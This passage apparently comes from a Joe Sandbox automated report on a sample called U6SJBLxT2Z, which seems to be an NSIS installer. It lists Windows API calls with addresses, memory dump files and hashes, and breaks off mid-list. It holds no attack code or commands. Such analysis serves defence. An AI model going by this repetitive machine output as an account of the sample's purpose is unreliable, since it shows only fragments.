                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000), ref: 6F772BB7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                  • Opcode ID: aef07e942a559807f460ab89b531c9bb71d93c0dd0a552275d9170621aa517a1
                                                                                                                                                                                                  • Instruction ID: b26619b0742c30c3a15731bf095faeedf8c0e279c9aab53a1300f4969eac2be3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aef07e942a559807f460ab89b531c9bb71d93c0dd0a552275d9170621aa517a1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE415E71924714EBDF309F78EB88F5937A4EB86328F21843AE9248A250DF34A555CFD1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F9E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                  • Instruction ID: f93b0abb86e743badb4163669300e0f642a0e5fa5e5e92c65fa389833edf0ca2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7E08C3220121AEBEF11AE618C04EEBBB6CFF01360F004832F910E6240D238E8218BA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403430,?,0041EA20,?,0041EA20,?,?,00000004,00000000), ref: 00405FCD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                  • Instruction ID: c6b158df49e6f5968e08b93a39371abef257cf80c9060b8b5a86bf4d0676d75d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FE0EC3225065AABDF109E669C04EEB7B6CEB053A0F004837FA55E3190D635E821DBA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(6F77505C,00000004,00000040,6F77504C), ref: 6F7729FD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                  • Opcode ID: 7aa997df8d00886f775ce22e939c92c278df7b3b108139bddc2ad897fcc385d2
                                                                                                                                                                                                  • Instruction ID: 033d914b6fb4cb2f1b8c57f7b2ce8cb5151706b27ca93c27dafbeac62b58af84
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7aa997df8d00886f775ce22e939c92c278df7b3b108139bddc2ad897fcc385d2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCF0AEB0A34AA0DEDB60CF3CA544B093BE0BB8B324B11457BE188D6240E7347064DBA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040630C,?,00000000,?,?,Call,?), ref: 004062A2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                  • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                                                                                  • Instruction ID: 30c71471ac55a0486040fafebf39dce1c160f5eedd86b0188f7d98683811911a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45D0123254020DBBEF11AF90ED01FAB375DAB08351F01442AFE16A4091D775D530A724
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                  • Opcode ID: 70aeeafad1a657ac925fe3f45df3c62ac490aa41a2f4e0fcc3a97934e0553a53
                                                                                                                                                                                                  • Instruction ID: a93de1ea602b80332484b308aebd2b3b1e31a5c4c7fa674852030dd18b7254c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70aeeafad1a657ac925fe3f45df3c62ac490aa41a2f4e0fcc3a97934e0553a53
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAD01772B041049BCB00DFA9AA48A9E73B0EF64328B308537D121F21D0D6F899419A29
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(00010416,00000000,00000000,00000000), ref: 004043C5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                  • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                  • Instruction ID: a8bf680dc00a45444681dc473137f9a6d1885d4682ebfcc4eb1f2e5ca771b872
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66C04C71754600BADA108B509E46F0677546750701F189429B641A50E0C674E410D61C
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,?,00000009,?), ref: 0040348B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                  • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                  • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00404160), ref: 00404393
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                                  • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                  • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000,00424020,75D423A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,00000000,00424020,75D423A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                                                                                                                                                    • Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,004033B0), ref: 004054D4
                                                                                                                                                                                                    • Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll), ref: 004054E6
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                                                                                                                                                    • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                                                                                                                                                    • Part of subcall function 004059FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
                                                                                                                                                                                                    • Part of subcall function 004059FA: CloseHandle.KERNEL32(?), ref: 00405A30
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                                                    • Part of subcall function 004068B1: WaitForSingleObject.KERNEL32(?,00000064), ref: 004068C2
                                                                                                                                                                                                    • Part of subcall function 004068B1: GetExitCodeProcess.KERNEL32(?,?), ref: 004068E4
                                                                                                                                                                                                    • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2972824698-0
                                                                                                                                                                                                  • Opcode ID: 5964da7f973718390334a5d1285ca24234599016c86872e96086f6d140a0f19c
                                                                                                                                                                                                  • Instruction ID: 70f87f17d48a981753e2349e7fd5e29e0bd5cf5a9d75e43b79cc9d2baa006ef6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5964da7f973718390334a5d1285ca24234599016c86872e96086f6d140a0f19c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F09632905111EBCB10AFA589849DE72B4DF00314B25453BE552B31D0C7BC0D419A6E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
